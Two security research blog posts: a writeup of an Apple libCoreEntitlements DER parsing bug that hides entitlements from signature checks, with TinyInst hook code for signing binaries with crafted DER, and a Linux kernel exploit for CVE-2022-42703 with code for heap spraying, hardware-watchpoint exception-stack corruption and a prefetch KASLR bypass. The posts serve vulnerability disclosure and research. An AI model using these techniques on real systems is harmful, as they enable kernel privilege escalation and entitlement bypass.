  • Checks on the signature are performed using the CoreTrust library by calling CTEvaluateAMFICodeSignatureCMS. This process has recently been documented in another vulnerability writeup and will not be examined in detail as it does not relate to entitlements directly.

  • Additional checks on the signature and entitlements are performed in amfid via the verify_code_directory function. This call will be analyzed in-depth later. One interesting detail about this interaction is that amfid receives the path to the executable as a parameter. In order to prevent race conditions where the file was changed between being loaded by kernel and checked by amfid, amfid returns the cdHash of the checked file. It is then verified that this cdHash matches the cdHash of the file in the kernel.

  • Provisioning profile information is retrieved and it is checked that the entitlements in the binary are a subset of the entitlements in the provisioning profile. This is done with the CEContextIsSubset function. This step does not appear to be present on macOS running on Intel CPUs, however even in that case, the entitlements are still checked in amfid as will be shown below.

The verify_code_directory function of amfid performs (among other things) the following actions:

  • Parses the binary and extracts all the relevant information for integrity checking. The code that does that is part of the open-source Security library and the two most relevant classes here are StaticCode and SecStaticCode. This code is also responsible for extracting the DER-encoded entitlements. Once again, if only XML-encoded entitlements are present, they get converted to DER format. This is, once again, done by the CFPropertyListCreateWithData and CESerializeCFDictionary pair of functions. Additionally, for later use, entitlements are also converted to CFDictionary representation. This conversion from DER to CFDictionary is done using the CEManagedContextFromCFData and CEQueryContextToCFDictionary function pair.

  • Checks that the signature signs the correct cdHash and checks the signature itself. The checking of the digital signature certificate chain isn’t actually done by the amfid process. amfid calls into trustd for that.

  • On macOS, the entitlements contained in the binary are filtered into restricted and unrestricted ones. On macOS, the unrestricted entitlements are com.apple.application-identifier, com.apple.security.application-groups*, com.apple.private.signing-identifier and com.apple.security.*. If the binary contains any entitlements not listed above, it needs to be checked against a provisioning profile. The check here relies on the entitlements CFDictionary, extracted earlier in amfid.

Later, when the binary runs, if the operating system wants to check that the binary contains an entitlement to perform a specific action, it can do this in several ways. The “old way” of doing this is to retrieve a dictionary representation of entitlements and query a dictionary for a specific key. However, there is also a new API for querying entitlements, where the caller first creates a CEQuery object containing the entitlement key they want to query (and, optionally, the expected value) and then performs the query by calling CEContextQuery function with the CEQuery object as a parameter. For example, the IOTaskHasEntitlement function, which takes an entitlement name and returns bool relies on the latter API.

libCoreEntitlements

You might have noticed that a lot of functions for interacting with DER entitlements start with the letters “CE”, such as CEQueryContextToCFDictionary or CEContextQuery. Here, CE stands for libCoreEntitlements, which is a new library created specifically for DER-encoded entitlements. libCoreEntitlements is present both in the userspace (as libCoreEntitlements.dylib) and in the OS kernel (as a part of AppleMobileFileIntegrity kernel extension). So any vulnerability related to parsing the DER entitlement format would be located there.

“There are no vulnerabilities here”, I declared in one of the Project Zero team meetings. At the time, I based this claim on the following:

  • There is a single library for parsing DER entitlements, unlike the four/five used for XML entitlements. While there are two versions of the library, in userspace and kernel, those appear to be the same. Thus, there is no potential for parsing differential bugs like Psychic Paper. In addition to this, binary formats are much less susceptible to such issues in the first place.

  • The library is quite small. I both reviewed and fuzzed the library for memory corruption vulnerabilities and didn’t find anything.

It turns out I was completely wrong (as often happens when someone declares code to be bug-free). But first…

Interlude: SHA1 Collisions

After my failure to find a good libCoreEntitlements bug, I turned to other ideas. One thing I noticed when digging into Apple integrity checks is that SHA1 is still supported as a valid hash type for Code Directory / cdHash. Since practical SHA1 collision attacks have been known for some time, I wanted to see if they can somehow be applied to break the entitlement check.

It should be noted that there are two kinds of SHA1 collision attacks:

  • Identical prefix attacks, where an attacker starts with a common file prefix and then constructs collision blocks such that SHA1(prefix + collision_blocks1) == SHA1(prefix + collision_blocks2).

  • Chosen prefix attacks, where the attacker starts with two different prefixes chosen by the attacker and constructs collision blocks such that SHA1(prefix1 + collision_blocks1) == SHA1(prefix2 + collision_blocks2).

While both attacks are currently practical against SHA1, the first type is significantly cheaper than the second one. The authors of the SHA-1 is a Shambles paper from 2020 report a “cost of US$ 11k for a (identical prefix) collision, and US$ 45k for a chosen-prefix collision”. So I wanted to see if an identical prefix attack on DER entitlements is possible. Special thanks to Ange Albertini for bringing me up to speed on the current state of SHA1 collision attacks.

My general idea was to

  • Construct two sets of entitlements that have the same SHA1 hash
  • Since entitlements will have the same SHA1 hash, the cdHash of the corresponding binaries will also be the same, as long as the corresponding Code Directories use SHA1 as the hash algorithm.
  • Exploit a race condition and switch the binary between being opened by the kernel and being opened by amfid
  • If everything goes well, amfid is going to see one set of entitlements and the kernel another set of entitlements, while believing that the binary hasn’t changed.

In order to construct an identical-prefix collision, my plan was to have an entitlements file that contains a long string. The string would declare a 16-bit size, and the identical prefix would end right at the place where the string length is stored. That way, when a collision is found, the lengths of the string in the two files would differ. Following the lengths would be more collision data (junk), but that would be considered string content and the parsing of the file would still succeed. Since the length of the string in the two files would be different, parsing would continue from two different places in the two files. This idea is illustrated in the following image.


A (failed) idea for exploiting an identical prefix SHA1 collision against DER entitlements. The blue parts of the files are the same, while green and the red part represent (different) collision blocks.

Except it won’t work.

The reason it won’t work is that every object in DER, including an object that contains other objects, has a size. Once again, hat tip to Ange Albertini who pointed out right away that this is going to be a problem.

Since each individual entitlement is stored in a separate sequence object, with our collision we could change the length of a string inside the sequence object (e.g. a value of some entitlement), but not change the length of the sequence object itself. Having a mismatch between the sequence length and the length of content inside the sequence could, depending on how the parser is implemented, lead to a parsing failure. Alternatively, if the parser was more permissive, the parser would succeed but would continue parsing after the end of the current sequence, so the collision wouldn’t cause different entitlements to be seen in two different files.

Unless the sequence length is completely ignored.

So I took another look at the library, specifically at how sequence length was handled in different parts of the library, and that is when I found the actual bug.

The actual bug

libCoreEntitlements does not implement traversing DER entitlements in a single place. Instead, traversing is implemented in (at least) three different places:

  • Inside recursivelyValidateEntitlements, called from CEValidate which is used to validate entitlements before being loaded (e.g. CEValidate is called from CEManagedContextFromCFData which was mentioned before). Among other things, CEValidate ensures that entitlements are in alphabetical order and there are no duplicate entitlements.
  • der_vm_iterate, which is used when converting entitlements to dictionary (CEQueryContextToCFDictionary), but also from CEContextIsSubset.
  • der_vm_execute_nocopy, which is used when querying entitlements using CEContextQuery API.

The actual bug is that these traversal algorithms behave slightly differently, in particular in how they handle the entitlement sequence length. der_vm_iterate behaves correctly and, after processing a single key/value sequence, continues processing after the sequence end (as indicated by the sequence length). recursivelyValidateEntitlements and der_vm_execute_nocopy, however, completely ignore the sequence length (beyond an initial check that it is within the bounds of the entitlements blob) and, after processing a single entitlement (key/value sequence), continue processing after the end of the value. This difference in iterating over entitlements is illustrated in the following image.


Illustration of how different algorithms within libCoreEntitlements traverse the same DER structure. der_vm_iterate is shown as green arrows on the left while der_vm_execute is shown as red arrows on the right. The red parts of the file represent a “hidden” entitlement that is only visible to the second algorithm.
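
A minimal sketch of the difference (illustrative only, not Apple's code, and assuming short-form DER lengths, i.e. contents shorter than 128 bytes, so every object is one tag byte, one length byte, then the content):

#include <stddef.h>
#include <stdint.h>

// Offset just past the TLV object that starts at `off`.
static size_t tlv_end(const uint8_t* der, size_t off) {
  return off + 2 + der[off + 1];
}

// der_vm_iterate-style: advance past the whole key/value SEQUENCE, so any
// extra object nested inside it is skipped.
static size_t next_correct(const uint8_t* der, size_t seq_off) {
  return tlv_end(der, seq_off);
}

// der_vm_execute_nocopy-style: ignore the SEQUENCE length and step over the
// key and the value individually. An object smuggled in after the value,
// but still inside the sequence, becomes the "next" entitlement.
static size_t next_buggy(const uint8_t* der, size_t seq_off) {
  size_t key_off = seq_off + 2;              // first child of the sequence
  size_t value_off = tlv_end(der, key_off);  // second child (the value)
  return tlv_end(der, value_off);
}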

This allowed hiding entitlements by embedding them as children of other entitlements, as shown below. Such entitlements would then be visible to CEValidate and CEContextQuery, but hidden from CEQueryContextToCFDictionary and CEContextIsSubset.

SEQUENCE          

  UTF8STRING        :application-identifier

  UTF8STRING        :testapp

  SEQUENCE          

    UTF8STRING        :com.apple.private.foo

    UTF8STRING        :bar

SEQUENCE          

  UTF8STRING        :get-task-allow

  BOOLEAN           :255

Luckily (for an attacker), the functions used to perform the check that all entitlements in the binary are a subset of those in the provisioning profile wouldn’t see these hidden entitlements, which would only surface when the kernel would query for a presence of a specific entitlement using the CEContextQuery API.

Since CEValidate would also see the “hidden” entitlements, these would need to be in alphabetical order together with the “normal” entitlements. However, because generally allowed entitlements such as application-identifier on iOS and com.apple.application-identifier on macOS appear early in the alphabetical order, this requirement doesn’t pose an obstacle to exploitation.

Exploitation

In order to try to exploit these issues, some tooling was required. Firstly, tooling to create crafted entitlements DER. For this, I created a small utility called createder.cpp which can be used for example as

./createder entitlements.der com.apple.application-identifier=testapp -- com.apple.private.security.kext-collection-management 

where entitlements.der is the output DER encoded entitlements file, entitlements before “--” are “normal” entitlements and those after “--” are hidden.

Next, I needed a way to embed such crafted entitlements into a signature blob. Normally, for signing binaries, Apple’s codesign utility is used. However, this utility only accepts XML entitlements as input and the user can’t provide a DER blob. At some point, codesign converts the user-provided XML to DER and embeds both in the resulting binary.

I decided the easiest way to embed custom DER in a binary would be to modify codesign behavior, specifically the XML to DER conversion process. To do this, I used TinyInst, a dynamic instrumentation library I developed together with contributors. TinyInst currently supports macOS and Windows.

In order to embed custom DER, I hooked two functions from libCoreEntitlements that are used during XML to DER conversion: CESizeSerialization and CESerialize (CESerializeWithOptions on macOS 13 / iOS 16). The first one computes the size of DER while the second one outputs DER bytes.

Initially, I wrote these hooks using TinyInst’s general-purpose low-level instrumentation API. However, since this process was more cumbersome than necessary, I have since created an API specifically for function hooking. So instead of linking to my initial implementation that I sent with the bug report to Apple, let me instead show how the hooks would be implemented using the new TinyInst Hook API:

cehook.h

#include "hook.h"

class CESizeSerializationHook : public HookReplace {

public:

  CESizeSerializationHook() : HookReplace("libCoreEntitlements.dylib",

                                          "_CESizeSerialization",3) {}

protected:

  void OnFunctionEntered() override;

};

class CESerializeWithOptionsHook : public HookReplace {

public:

  CESerializeWithOptionsHook() : HookReplace("libCoreEntitlements.dylib",

                                             "_CESerializeWithOptions", 6) {}

protected:

  void OnFunctionEntered() override;

};

// the main client

class CEInst : public TinyInst {

public:

  CEInst();

protected:

  void OnModuleLoaded(void* module, char* module_name) override;

};

cehook.cpp

#include "cehook.h"

#include <fstream>

char *der;

size_t der_size;

size_t kCENoError;

// read entitlements.der into buffer

void ReadEntitlementsFile() {

  std::ifstream file("entitlements.der", std::ios::binary | std::ios::ate);

  if(file.fail()) {

    FATAL("Error reading entitlements file");

  }

  der_size = (size_t)file.tellg();

  file.seekg(0, std::ios::beg);

  der = (char *)malloc(der_size);

  file.read(der, der_size);

}

void CESizeSerializationHook::OnFunctionEntered() {

  // 3rd argument (output) is a pointer to the size

  printf("In CESizeSerialization\n");

  size_t out_addr = GetArg(2);

  RemoteWrite((void*)out_addr, &der_size, sizeof(der_size));

  SetReturnValue(kCENoError);

}

void CESerializeWithOptionsHook::OnFunctionEntered() {

  // 5th argument points to output buffer

  printf("In CESerializeWithOptions\n");

  size_t out_addr = GetArg(4);

  RemoteWrite((void*)out_addr, der, der_size);

  SetReturnValue(kCENoError);

}

CEInst::CEInst() {

  ReadEntitlementsFile();

  RegisterHook(new CESizeSerializationHook());

  RegisterHook(new CESerializeWithOptionsHook());

}

void CEInst::OnModuleLoaded(void* module, char* module_name) {

  if(!strcmp(module_name, "libCoreEntitlements.dylib")) {

    // we must get the value of kCENoError,

    // which is libCoreEntitlements return value in case no error

    size_t kCENoError_addr = 

           (size_t)GetSymbolAddress(module, (char*)"_kCENoError");

    if (!kCENoError_addr) FATAL("Error resolving symbol");

    RemoteRead((void *)kCENoError_addr, &kCENoError, sizeof(kCENoError));

  }

  TinyInst::OnModuleLoaded(module, module_name);

}

HookReplace (the base class for our two hooks) is a helper class used to completely replace the function implementation with the hook. CESizeSerializationHook::OnFunctionEntered() and CESerializeWithOptionsHook::OnFunctionEntered() are the bodies of the hooks. Additional code is needed to read the replacement entitlement DER and also to retrieve the value of kCENoError, which is the value libCoreEntitlements functions return on success and that we must return from our hooked versions. Note that, on macOS Monterey, CESerializeWithOptions should be replaced with CESerialize, and the output address will be GetArg(3) rather than GetArg(4).

So, with that in place, I could sign a binary using DER provided in the entitlements.der file.
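
With the client built, the invocation might look something like the following (the client binary name and target application here are hypothetical; -s - requests ad-hoc signing and --entitlements is the standard codesign flag for supplying XML entitlements, which the hooks then replace with the crafted DER):

./ceinst -- codesign -s - --entitlements entitlements.xml /path/to/testapp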

Now, with the tooling in place, the question becomes, how to exploit it. Or rather, which entitlement to target. In order to exploit the issue, we need to find an entitlement check that is ultimately made using CEContextQuery API. Unfortunately, that rules out most userspace daemons - all the ones I looked at still did entitlement checking the “old way”, by first obtaining a dictionary representation of entitlements. That leaves “just” the entitlement checks done by the OS kernel.

Fortunately, a lot of checks in the kernel are made using the vulnerable API. Some of these checks are done by AppleMobileFileIntegrity itself using functions like OSEntitlements::queryEntitlementsFor, AppleMobileFileIntegrity::AMFIEntitlementGetBool or proc_has_entitlement. But there are other APIs as well. For example, the IOTaskHasEntitlement and IOCurrentTaskHasEntitlement functions that are used from over a hundred places in the kernel (according to macOS Monterey kernel cache) end up calling CEContextQuery (by first calling amfi->OSEntitlements_query()).

One other potentially vulnerable API was IOUserClient::copyClientEntitlement, but only on Apple silicon, where pmap_cs_enabled() is true. Although I didn’t test this, there is some indication that in that case the CEContextQuery API or something similar to it is used. IOUserClient::copyClientEntitlement is most notably used by device drivers to check entitlements.

I attempted to exploit the issue on both macOS and iOS. On macOS, I found places where such an entitlement bypass could be used to unlock previously unreachable attack surfaces, but nothing that would immediately provide a stand-alone exploit. In the end, to report something while looking for a better primitive, I reported that I was able to invoke functionality of the kext_request API (kernel extension API) that I normally shouldn’t be able to, even as the root user. At the time, I did my testing on macOS Monterey, versions 12.6 and 12.6.1.

On iOS, exploiting such an issue would potentially be more interesting, as it could be used as part of a jailbreak. I was experimenting with iOS 16.1 and nothing I tried seemed to work, but due to the lack of introspection on the iOS platform I couldn’t figure out why at the time.

That is, until I received a reply from Apple on my macOS report, asking me if I could reproduce on macOS Ventura. macOS Ventura had been released the same week I sent my report to Apple, and I was hesitant to upgrade to a new major version while I had a working setup on macOS Monterey. But indeed, when I upgraded to Ventura, and after making sure my tooling still worked, the DER issue wouldn’t reproduce anymore. This was likely also the reason all of my iOS experiments were unsuccessful: iOS 16 shares its codebase with macOS Ventura.

It appears that the issue was fixed as part of a refactoring and not as a security issue (had it been handled as a security issue, macOS Monterey would have been updated as well, since Apple releases some security patches not just for the latest major version of macOS, but also for the two previous ones). Looking at the code, it appears the API libCoreEntitlements uses to do low-level DER parsing has changed somewhat - on macOS Monterey, libCoreEntitlements used mostly ccder_decode* functions to interact with DER, while on macOS Ventura ccder_blob_decode* functions are used more often. The latter additionally take the parent DER structure as input and thus make processing of hierarchical DER structures somewhat less error-prone. As a consequence of this change, der_vm_execute_nocopy continues processing the next key/value sequence after the end of the current one (which is the intended behavior) and not, as before, after the end of the value object. At this point, since I could no longer reproduce the issue on the latest OS release, I was no longer motivated to write the exploit and stopped my efforts in order to focus on other projects.

Apple addressed the issue as CVE-2022-42855 on December 13, 2022. While Apple applied the CVE to all supported versions of their operating systems, including macOS Ventura and iOS 16, on those latest OS versions the patch seems to serve as an additional validation step. Specifically, on macOS Ventura, the patch is applied to the function der_decode_key_value and makes sure that the key/value sequence does not contain other elements besides just the key and the value (in other words, it makes sure that the length of the sequence matches the combined length of the key and value objects).

Conclusion

It is difficult to claim that a particular code base has no vulnerabilities. While that might be possible for specific types of vulnerabilities, it is difficult, and potentially impossible, to predict all types of vulnerabilities a complex codebase might have. After all, you can’t reason about what you don’t know.

While DER encoding is certainly a much safer choice than XML when it comes to parsing logic issues, this blog post demonstrates that such issues are still possible even with the DER format.

And what about the SHA1 collision? While the identical-prefix attack shouldn’t work against DER, doesn’t that still leave the chosen-prefix attack? Maybe, but that’s something to explore another time. Or maybe (hopefully) Apple will remove SHA1 support in their signature blobs and there will be nothing to explore at all.

Exploiting CVE-2022-42703 - Bringing back the stack attack

8 December 2022 at 19:04

Seth Jenkins, Project Zero


This blog post details an exploit for CVE-2022-42703 (P0 issue 2351 - Fixed 5 September 2022), a bug Jann Horn found in the Linux kernel's memory management (MM) subsystem that leads to a use-after-free on struct anon_vma. As the bug is very complex (I certainly struggle to understand it!), a future blog post will describe the bug in full. For the time being, the issue tracker entry, this LWN article explaining what an anon_vma is, and the commit that introduced the bug are great resources for additional context.

Setting the scene

Successfully triggering the underlying vulnerability causes folio->mapping to point to a freed anon_vma object. Calling madvise(..., MADV_PAGEOUT) can then be used to repeatedly trigger accesses to the freed anon_vma in folio_lock_anon_vma_read():



struct anon_vma *folio_lock_anon_vma_read(struct folio *folio,
                                          struct rmap_walk_control *rwc)
{
        struct anon_vma *anon_vma = NULL;
        struct anon_vma *root_anon_vma;
        unsigned long anon_mapping;

        rcu_read_lock();
        anon_mapping = (unsigned long)READ_ONCE(folio->mapping);
        if ((anon_mapping & PAGE_MAPPING_FLAGS) != PAGE_MAPPING_ANON)
                goto out;
        if (!folio_mapped(folio))
                goto out;

        // anon_vma is dangling pointer
        anon_vma = (struct anon_vma *) (anon_mapping - PAGE_MAPPING_ANON);
        // root_anon_vma is read from dangling pointer
        root_anon_vma = READ_ONCE(anon_vma->root);
        if (down_read_trylock(&root_anon_vma->rwsem)) {
                [...]
                if (!folio_mapped(folio)) { // false
                        [...]
                }
                goto out;
        }

        if (rwc && rwc->try_lock) { // true
                anon_vma = NULL;
                rwc->contended = true;
                goto out;
        }
        [...]
out:
        rcu_read_unlock();
        return anon_vma; // return dangling pointer
}
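For concreteness, here is a minimal sketch of the userspace trigger loop (assuming addr and len describe the affected mapping, and that MADV_PAGEOUT is available, i.e. Linux 5.4 or later). Each pass forces an rmap walk that reaches the dangling-pointer accesses shown above.

#include <stddef.h>
#include <sys/mman.h>

// Repeatedly ask the kernel to reclaim the pages backing [addr, addr+len),
// driving folio_lock_anon_vma_read() and its accesses to the freed anon_vma.
void trigger_uaf_access(void *addr, size_t len, int iterations) {
    for (int i = 0; i < iterations; i++)
        madvise(addr, len, MADV_PAGEOUT);
}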


One potential exploit technique is to let the function return the dangling anon_vma pointer and try to make the subsequent operations do something useful. Instead, we chose to use the down_read_trylock() call within the function to corrupt memory at a chosen address, which we can do if we can control the root_anon_vma pointer that is read from the freed anon_vma.


Controlling the root_anon_vma pointer means reclaiming the freed anon_vma with attacker-controlled memory. struct anon_vma structures are allocated from their own kmalloc cache, which means we cannot simply free one and reclaim it with a different object. Instead we cause the associated anon_vma slab page to be returned back to the kernel page allocator by following a very similar strategy to the one documented here. By freeing all the anon_vma objects on a slab page, then flushing the percpu slab page partial freelist, we can cause the virtual memory previously associated with the anon_vma to be returned back to the page allocator. We then spray pipe buffers in order to reclaim the freed anon_vma with attacker-controlled memory.
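A minimal sketch of that spray, assuming the slab page has already been freed back to the page allocator and that fake_anon_vma/len describe the replacement object (with its root field pointing at the chosen target of the down_read_trylock() write):

#include <string.h>
#include <unistd.h>

#define NUM_PIPES 512

// The first write to each fresh pipe makes the kernel allocate a page for
// the pipe's data buffer; with enough pipes, one of those allocations
// reclaims the freed anon_vma page with attacker-controlled bytes.
int spray_pipes(int fds[NUM_PIPES][2], const void *fake_anon_vma, size_t len) {
    char page[4096];
    memset(page, 0, sizeof(page));
    // Tile the fake object across the page so a copy lands at the slab
    // offset where the original anon_vma lived.
    for (size_t off = 0; off + len <= sizeof(page); off += len)
        memcpy(page + off, fake_anon_vma, len);
    for (int i = 0; i < NUM_PIPES; i++) {
        if (pipe(fds[i]) < 0)
            return -1;
        if (write(fds[i][1], page, sizeof(page)) != sizeof(page))
            return -1;
    }
    return 0;
}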


At this point, we’ve discussed how to turn our use-after-free into a down_read_trylock() call on an attacker-controlled pointer. The implementation of down_read_trylock() is as follows:


struct rw_semaphore {
        atomic_long_t count;
        atomic_long_t owner;
        struct optimistic_spin_queue osq; /* spinner MCS lock */
        raw_spinlock_t wait_lock;
        struct list_head wait_list;
};

...

static inline int __down_read_trylock(struct rw_semaphore *sem)
{
        long tmp;

        DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);

        tmp = atomic_long_read(&sem->count);
        while (!(tmp & RWSEM_READ_FAILED_MASK)) {
                if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,
                                                    tmp + RWSEM_READER_BIAS)) {
                        rwsem_set_reader_owned(sem);
                        return 1;
                }
        }
        return 0;
}



It was helpful to emulate down_read_trylock() in unicorn to determine how it behaves when given different sem->count values. Assuming this code is operating on inert and unchanging memory, it will increment sem->count by 0x100 if the 3 least significant bits and the most significant bit are all unset. That means it is difficult to modify a kernel pointer (kernel addresses have the most significant bit set) and we cannot modify any non-8-byte-aligned values (as they’ll have one or more of the bottom three bits set). Additionally, this semaphore is later unlocked, causing whatever write we perform to be reverted in the imminent future. Furthermore, at this point we don’t have an established strategy for determining the KASLR slide nor figuring out the addresses of any objects we might want to overwrite with our newfound primitive. It turns out that regardless of any randomization the kernel presently has in place, there’s a straightforward strategy for exploiting this bug even given such a constrained arbitrary write.
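To make those semantics concrete, here is a small userspace model (not kernel code; the mask and bias values are taken from recent kernels' rwsem definitions) of what one invocation of the primitive does to a chosen 64-bit value:

#include <stdbool.h>
#include <stdint.h>

#define RWSEM_READER_BIAS      0x100UL
// Writer-locked, waiters and handoff bits, plus the read-fail (sign) bit.
#define RWSEM_READ_FAILED_MASK (0x7UL | (1UL << 63))

// Models __down_read_trylock() acting on attacker-pointed memory: the value
// is incremented by 0x100 only if the three low bits and the top bit are
// all clear; otherwise the "write" fails.
bool model_down_read_trylock(uint64_t *count) {
    uint64_t tmp = *count;
    if (tmp & RWSEM_READ_FAILED_MASK)
        return false;
    *count = tmp + RWSEM_READER_BIAS;
    return true;
}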

Stack corruption…

On x86-64 Linux, when the CPU takes certain interrupts and exceptions, it will swap to a respective stack that is mapped at a static, non-randomized virtual address, with a different stack for the different exception types. Brief documentation of those stacks and their parent structure, the cpu_entry_area, can be found here. These stacks are most often used on entry into the kernel from userland, but they’re used for exceptions that happen in kernel mode as well. We’ve recently seen KCTF entries where attackers take advantage of the non-randomized cpu_entry_area stacks in order to access data at a known virtual address in kernel accessible memory even in the presence of SMAP and KASLR. You could also use these stacks to forge attacker-controlled data at a known kernel virtual address. This works because the attacker task’s general purpose register contents are pushed directly onto this stack when the switch from userland to kernel mode occurs due to one of these exceptions. This also occurs when the kernel itself generates an Interrupt Stack Table exception and swaps to an exception stack - except in that case, kernel GPRs are pushed instead. These pushed registers are later used to restore kernel state once the exception is handled. In the case of a userland triggered exception, register contents are restored from the task stack.


One example of an IST exception is a #DB exception, which can be triggered by an attacker via a hardware breakpoint (the associated registers are described here). Hardware breakpoints can be triggered by a variety of different memory access types, namely reads, writes, and instruction fetches. These hardware breakpoints can be set using ptrace(2), and are preserved during kernel mode execution in a task context, such as during a syscall. That means that it’s possible for an attacker-set hardware breakpoint to be triggered in kernel mode, e.g. during a copy_to/from_user call. The resulting exception will save and restore the kernel context via the aforementioned non-randomized exception stack, and that kernel context is an exceptionally good target for our arbitrary write primitive.
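As a sketch of that setup (assumptions: x86-64 Linux, and a tracee that is already attached and stopped), installing an 8-byte write watchpoint through the debug-register slots of struct user might look like this:

#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>

// Arm DR0 as an 8-byte write watchpoint on `addr` in the tracee. When the
// kernel later writes to `addr` on the tracee's behalf (e.g. inside
// copy_to_user), the #DB exception fires in kernel mode.
int set_write_watchpoint(pid_t pid, unsigned long addr) {
    if (ptrace(PTRACE_POKEUSER, pid,
               (void *)offsetof(struct user, u_debugreg[0]),
               (void *)addr) < 0)
        return -1;
    // DR7: local-enable DR0 (bit 0), break on data writes (R/W0 = 0b01 in
    // bits 16-17), 8-byte length (LEN0 = 0b10 in bits 18-19).
    unsigned long dr7 = 0x1UL | (0x1UL << 16) | (0x2UL << 18);
    if (ptrace(PTRACE_POKEUSER, pid,
               (void *)offsetof(struct user, u_debugreg[7]),
               (void *)dr7) < 0)
        return -1;
    return 0;
}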


Any of the registers that copy_to/from_user is actively using at the time it handles the hardware breakpoint are corruptible by using our arbitrary-write primitive to overwrite their saved values on the exception stack. In this case, the size of the copy_user call is the intuitive target. The size value is consistently stored in the rcx register, which will be saved at the same virtual address every time the hardware breakpoint is hit. After corrupting this saved register with our arbitrary write primitive, the kernel will restore rcx from the exception stack once it returns back to copy_to/from_user. Since rcx defines the number of bytes copy_user should copy, this corruption will cause the kernel to illicitly copy too many bytes between userland and the kernel.

…begets stack corruption

The attack strategy starts as follows:

  1. Fork a process Y from process X.

  2. Process X ptraces process Y, then sets a hardware breakpoint at a known virtual address [addr] in process Y.

  3. Process Y makes a large number of calls to uname(2), which calls copy_to_user from a kernel stack buffer to [addr]. This causes the kernel to constantly trigger the hardware watchpoint and enter the DB exception handler, using the DB exception stack to save and restore copy_to_user state (see the sketch after this list).

  4. Simultaneously make many arbitrary writes at the known location of the DB exception stack’s saved rcx value, which is Process Y’s copy_to_user’s saved length.
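A sketch of the tracee side of step 3, assuming [addr] is a mapped buffer that the tracer has armed with a write watchpoint:

#include <sys/utsname.h>

// Each uname() call makes the kernel copy_to_user() a struct utsname into
// `addr`, tripping the watchpoint in kernel mode; the #DB handler then
// saves copy_to_user's registers (including the size in rcx) to the
// fixed-address exception stack, where the arbitrary write can reach them.
void hammer_uname(void *addr) {
    for (;;)
        uname((struct utsname *)addr);
}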


DB Exception handling while the arbitrary write primitive writes to the CEA stack leads to corruption of the rcx register



The DB exception stack is used rarely, so it’s unlikely that we corrupt any unexpected kernel state via a spurious DB exception while spamming our arbitrary write primitive. The technique is also racy, but missing the race simply means corrupting stale stack data. In that case, we simply try again. In my experience, it rarely takes more than a few seconds to win the race successfully.


Upon successful corruption of the length value, the kernel will copy much of the current task’s stack back to userland, including the task-local stack cookie and return addresses. We can subsequently invert our technique and attack a copy_from_user call instead. Instead of copying too many bytes from the kernel task stack to userland, we induce the kernel to copy too many bytes from userland to the kernel task stack! Again we use a syscall, prctl(2), that performs a copy_from_user call to a kernel stack buffer. Now, by corrupting the length value, we generate a stack buffer overflow condition in this function where none previously existed. Since we’ve already leaked the stack cookie and the KASLR slide, it is trivial to bypass both mitigations and overwrite the return address.


Image showing that we’ve gained control of the instruction pointer


Completing a ROP chain for the kernel is left as an exercise to the reader.

Fetching the KASLR slide with prefetch

Upon reporting this bug to the Linux kernel security team, our suggestion was to start randomizing the location of the percpu cpu_entry_area (CEA), and consequently the associated exception and syscall entry stacks. This is an effective mitigation against remote attackers, but is insufficient to prevent a local attacker from taking advantage. Six years ago, Daniel Gruss et al. discovered a new, more reliable technique for exploiting the TLB timing side channel in x86 CPUs. Their results demonstrated that prefetch instructions executed in user mode retired at statistically significant different latencies depending on whether the requested virtual address to be prefetched was mapped vs unmapped, even if that virtual address was only mapped in kernel mode. kPTI was helpful in mitigating this side channel; however, most modern CPUs now have innate protection against Meltdown, which kPTI was specifically designed to address, and thus kPTI (which has significant performance implications) is disabled on modern microarchitectures. That decision means it is once again possible to take advantage of the prefetch side channel to defeat not only KASLR, but also the CPU entry area randomization mitigation, preserving the viability of the CEA stack corruption exploit technique against modern x86 CPUs.


There are surprisingly few fast and reliable examples of this prefetch KASLR bypass technique available in the open source realm, so I made the decision to write one.

Implementation

The meat of implementing this technique effectively is in serially reading the processor’s time stamp counter before and after performing a prefetch. Daniel Gruss helpfully provided highly effective and open source code for doing just that. The only edit I made (as suggested by Jann Horn) was to swap to using lfence instead of cpuid as the serializing instruction, as cpuid is emulated in VM environments. It also became apparent in practice that there was no need to perform any cache-flushing routines in order to witness the side-channel effect. It is simply enough to time every prefetch attempt.
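A minimal sketch of that measurement core (assuming x86-64 and GCC/Clang extended inline assembly, with lfence as the serializing instruction as described above):

#include <stdint.h>

// Read the time stamp counter between lfence fences so the rdtsc cannot
// drift across the prefetch being measured.
static inline uint64_t rdtsc_fenced(void) {
    uint32_t lo, hi;
    __asm__ volatile("lfence\n\trdtsc\n\tlfence"
                     : "=a"(lo), "=d"(hi) : : "memory");
    return ((uint64_t)hi << 32) | lo;
}

// Time a single prefetch of a candidate kernel address; mapped addresses
// tend to retire measurably faster than unmapped ones.
static inline uint64_t time_prefetch(uintptr_t kaddr) {
    uint64_t t0 = rdtsc_fenced();
    __asm__ volatile("prefetcht0 (%0)" : : "r"(kaddr) : "memory");
    uint64_t t1 = rdtsc_fenced();
    return t1 - t0;
}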


Generating prefetch timings for all 512 possible KASLR slots yields quite a bit of fuzzy data in need of analysis. To minimize noise, multiple samples of each tested address are taken, and the minimum value from that set of samples is used in the results as the representative value for an address. On the Tiger Lake CPU this test was primarily performed on, no more than 16 samples per slot were needed to generate exceptionally reliable results. A low-resolution pass over the minimum prefetch times per slot first narrows down the area to search, avoiding false positives, before higher-resolution edge-detection code finds the precise address at which the prefetch run-time drops dramatically. The result of this effort is a PoC which can correctly identify the KASLR slide on my local machine with 99.999% accuracy (95% accuracy in a VM) while running faster than it takes to grep through kallsyms for the kernel base address:


Breaking KASLR with prefetch: grepping through kallsyms took .077 seconds, while using the prefetch technique took .013 seconds
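Using the timing primitive from the previous sketch, the sampling strategy might look like the following (the 0xffffffff80000000 base and 2 MiB slot size are the standard x86-64 KASLR parameters, assumed here; 16 samples per slot matches the figure quoted above):

#include <stdint.h>

#define KASLR_BASE 0xffffffff80000000UL
#define SLOT_SIZE  0x200000UL  /* 2 MiB KASLR alignment */
#define NUM_SLOTS  512
#define SAMPLES    16

// Record the minimum prefetch time per candidate slot; the minimum is a
// robust representative value because noise only ever adds latency.
void scan_slots(uint64_t out_min[NUM_SLOTS]) {
    for (int slot = 0; slot < NUM_SLOTS; slot++) {
        uintptr_t addr = KASLR_BASE + (uintptr_t)slot * SLOT_SIZE;
        uint64_t best = UINT64_MAX;
        for (int s = 0; s < SAMPLES; s++) {
            uint64_t t = time_prefetch(addr);
            if (t < best)
                best = t;
        }
        out_min[slot] = best;
    }
}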
